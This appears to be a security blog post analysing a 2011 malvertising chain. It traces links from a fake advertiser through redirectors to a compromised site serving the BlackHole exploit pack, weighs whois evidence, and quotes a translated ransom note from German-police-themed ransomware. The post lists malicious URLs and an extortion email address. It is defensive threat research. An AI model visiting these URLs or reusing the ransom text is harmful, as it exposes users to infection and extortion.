Link 7-b: (Fake Advertiser, malicious script) http://kineticgames.info/pubage/728x90.jpg, although the URL ends in .jpg, it's actually serving HTML containing an iframe pointing to:

Link 8: (Malicious redirector) http://sahoreen.in/hitcounter.php?u=pubage, which contains an iframe pointing to:

Link 9: (Malicious redirector) http://belygaur.in/ts/in.cgi?pubage, which throws an HTTP 302 redirect pointing to the exploit server:

Link 10: (Exploit server) http://town.incredibleoutcomes.com/index.php?tp=7058439543afabcf, serves BlackHole exploit pack. This isn't a malicious domain registered by the attacker, but a legitimate but compromised domain.

[Malvertising Analysis--The Puzzle]

Below are some causes of malvertising:

a) The attacker pretends to be a legitimate advertiser, submits a malicious ad (malvertisement) to an ad network, and tricks the ad network into accepting the submission.

b) The ad network was compromised, and the attacker injected malicious scripts into a link in the ad-serving chain.

So which case is this? Well for this particular case, it was a bit difficult for us to determine.

Upon first look, it seems to be case (a), because the advertiser in this case--kineticgames.info (184.172.216.234, ASN 36351, US Dallas), has a whois record with a Russian name and street address, yet is using an US IP and an Indian domain name for its name server (ns1.plumdook.in).

HOWEVER, the domain was registered on Aug 9th, 2010, which was a year ago, and from the screenshot below you can see that it sees to be quite a legitimate website:

Compared to many malvertising incidents we've studied, most fake domains will have been registered very recently and will either not have any website content, or will have content illegally mirrored (copied) from other websites.

This doesn't seem to be the case. So, is it case (b), where kineticgames.info is indeed a legitimate website, but have been compromised to serve malvertisements?

Seems reasonable, but only until we look at the other associated malicious domains. These are:

sahoreen.in (184.172.216.234, ASN 36351, US Dallas)
belygaur.in (184.172.216.234, ASN 36351, US Dallas)

These two domains were both created very recently, on the same day--July 7th, 2011. The whois records show the registrant to be "Piotr Poshkin," which resembles kineticgames.info's current "Vasiliy Pushkin." Furthermore, the phone number, street address, and zip codes are exactly the same as kineticgames.info's.

Kineticgames.info actually has a sister domain name: kinetic-games.com, registered on the same day last year (Aug 9th, 2010), and serving the same content. Both were initially registered under Bob Stevenson of Spain. Then, on July 14th and July 17th, 2011, kinetic-games.com and kineticgames.info were respectively transfered to the current contact (according to whois records) "Vasiliy Pushkin" of Russia.

Could it be, that it is the new owner, who is intentionally doing malvertising using these domains and the website, because the identity is seemingly legit?

Or could it be, that none of these matters, and that kineticgames.info simply have been hacked into and the attackers used it to submit malvertisement, and intentionally registered the malicious redirector domains sahoreen.in and belygaur.in to have whois records that resemble that of kineticgames.info?

Finally, two additional pieces of important information. First, according to Internet Archive (Wayback Machine), as of Jan 28th, 2011, kinetic-games.com had no actual website content--the owner was just registering the domain to sell as a premium domain:

Second, the website as of now, contains lots of vulnerabilities. It should be quite easy for someone to hack into both websites.

So what's the deal here?

We cannot make a conclusion right here. Perhaps the reader can help solve the puzzle?

[The Malware]

The malware pretends to be a crime-detection software from the Federal German Police. You can see in the screenshot above, it's using logo stolen from the real Federal German Police (Bundespolizei). It claims to have found child pornography along with other illegal content on the victim's computer. It claims that the victim's IP, OS, location, ISP, etc, have all been recorded, and locks down the computer completely, "to prevent further abuse."

A fine of 100 Euros must be paid within 24 hours to unlock the computer, or else all data will be deleted. We are in the process of informing all parties involved. This is our report.

This thread of ransomware has been around for a few months already, but improvements seen in this version include:

a) They now have an email "einzahlung@bundespol.net" that somewhat resembles the Federal German Police, who uses "@bundespolizei.de. The domain was registered through Bizcn.com, a registrar in China.

b) They now support two payment gateways, UKash and paysafecard.

Below is a translation of the text:

Attention!

Illegal operational activities have been detected. Based on laws of the Federal Republic of Germany, the system has been locked. The following legal violation has been detected: Your IP _______ was detected to have visited pages containing pornography, child pornography, bestiality and violence against children. At the same time, your computer has been identified to contain video files involving pornography, violence, and child pornography content! Furthermore, spam emails containing terrorism content were also sent from here. Your computer is therefore locked in order to eliminate the above illegal activities.

Your details:
IP, location, OS, ISP, etc.

In order to unlock this computer, you are obligated by law to pay a 100 Euro fine. You must make the payment within 24 hours. If payment has not been made within the allotted time, your hard disk will be irreversibly formatted.

1) Payment via Ukash:

To perform the transaction, please enter your purchased voucher code into the payment textbox and press OK. In case of errors, you should email your code to einzahlung@bundespol.net.

2) Payment via paysafecard:

Please input the code into the payment textbox and press OK. In case of errors, you should email your code to einzahlung@bundespol.net.


Read more (rest of article)...

Share this:blogger tutorials Social Bookmarking Blogger Widget